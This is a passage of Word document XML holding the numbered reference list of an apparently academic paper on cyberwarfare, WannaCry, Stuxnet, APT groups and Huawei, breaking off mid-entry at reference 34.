    <w:p w14:paraId="41873CF1" w14:textId="77777777" w:rsidR="004972EB" w:rsidRPr="007B1930" w:rsidRDefault="004972EB" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C43C31" w14:textId="7C39BDB1" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E363D" w14:textId="3293B2F2" w:rsidR="004972EB" w:rsidRPr="004972EB" w:rsidRDefault="004972EB" w:rsidP="004972EB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve">ADDIN Mendeley Bibliography CSL_BIBLIOGRAPHY </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">T. W. Bynum, “Philosophy in the information age,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metaphilosophy</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3A91D"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[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">World Wide Web Foundation, “History of the Web,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Web</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2008. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026B870B"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[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. Al-Fuqaha, M. Guizani, M. Mohammadi, M. Aledhari, and M. Ayyash, “Internet of Things: A Survey on Enabling Technologies, Protocols, and Applications,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Commun. Surv. Tutorials</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72286BBD"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[4]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. M. Furnell and M. J. Warren, “Computer hacking and cyber terrorism: The real threats in the new millennium?,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comput. Secur.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 1999.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BA1B17"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[5]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">P. A. Taylor, “From hackers to hacktivists: Speed bumps on the global superhighway?,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>New Media Soc.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2005.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ADFB46"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[6]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Cisco, “Packet Tracer - Network Simulator.” .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D95ED"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[7]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">W. Kim, “On cyberwarfare,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Int. J. Web Grid Serv.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BD9BB5"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[8]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">T. A. Berson and D. E. Denning, “Cyberwarfare,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Security and Privacy</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B5D33"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[9]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">R. Langner, “Stuxnet: Dissecting a cyberwarfare weapon,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Secur. Priv.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58033D7A"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[10]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. P. Farwell and R. Rohozinski, “Stuxnet and the Future of Cyber War,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Survival (Lond).</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A43E5"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[11]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. Lang, “The WannaCry ransomware attack,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Strateg. Comments</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EB621D"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[12]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Comptroller and Auditor General, “Investigation: WannaCry cyber attack and the NHS,” 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251FB5AC"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[13]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">hackingarticles.com, “Exploit Remote Windows PC with Eternalblue &amp;amp; Doublepulsar Exploit in Metasploit,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hackingarticles.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018. [Online]. Available: http://www.hackingarticles.in/exploit-remote-windows-pc-eternalblue-doublepulsar-exploit-metasploit/. [Accessed: 23-May-2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8957BB"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[14]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Goodin, “NSA-leaking Shadow Brokers just dumped its most damaging release yet,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ars Technica</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF78F61"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[15]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. R. Youngblood, “Ransomware,” in </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Business Theft and Fraud</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73444C09"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[16]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. Singh, C. Estan, G. Varghese, and S. Savage, “Automated Worm Fingerprinting,” in </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Symposium on Operation Systems Design and Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2004.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25E045"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[17]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. Mitrokotsa and C. Douligeris, “Denial-of-Service Attacks,” in </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Security: Current Status and Future Directions</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2007.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19793B"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[18]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Reuters, “U.S. blames North Korea for ‘WannaCry’ cyber attack,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reuters</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224C8ED2"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[19]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. M. Ehrenfeld, “WannaCry, Cybersecurity </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">and Health Information Technology: A Time to Act,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>J. Med. Syst.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0FE594"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[20]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">L. H. Newman, “How an Accidental ‘Kill Switch’ Slowed Friday’s Massive Ransomware Attack,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wired.com</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E7500E"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[21]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">I. Steadman, “The Russian underground economy has democratised cybercrime,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wired.co.uk</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2012. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF71B81"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[22]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. Lemay, J. Calvet, F. Menet, and J. M. Fernandez, “Survey of publicly available reports on advanced persistent threat actors,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comput. Secur.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6E56D"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[23]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Gold, “Unit 61398: Chinese Cyber-Espionage and the Advanced Persistent Threat,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>InfoSec Institute</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2013. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC5DF7"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[24]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">NCSA, “APT10 continuing to target UK organisations,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ncsa.gov.uk</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AD9EA0"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[25]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">N. Inkster, “The Huawei affair and China’s technology ambitions,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Survival (Lond).</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB4E6B"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[26]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. Agiwal, A. Roy, and N. Saxena, “Next generation 5G wireless networks: A comprehensive survey,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Communications Surveys and Tutorials</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC4719"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[27]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. K. Rao and R. Prasad, “Impact of 5G Technologies on Smart City Implementation,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wirel. Pers. Commun.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507056F5"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[28]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">L. Rushe, Dominic; Kuo, “Huawei’s problems deepen as western suspicions mount,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Guardian</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C4DCC9"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[29]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. C. Smith, “New US sanctions for Russian cyberattacks snare 2 Calif. tech firms,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SNL Energy Power Dly.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56AE17"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[30]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">B. Jensen, B. Valeriano, and R. Maness, “Fancy bears and digital trolls: Cyber strategy with a Russian twist,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>J. Strateg. Stud.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67615C21"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[31]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">T. Rid, “How Russia Pulled Off the Biggest Election Hack in U.S. History,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Esquire Magazine</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D18570A"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[32]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. Haggard and J. R. Lindsay, “North Korea and the Sony hack: Exporting instability through cyberspace,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Asia Pacific Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CFCBC9"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[33]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">P. Elkind, “Inside the hack of the century,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fortune</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C9BDDA"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[34]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. Ball, J. Borger, and G. Greenwald, “Revealed: how US and UK spy agencies defeat internet privacy and security,” </w:t>
      </w:r>
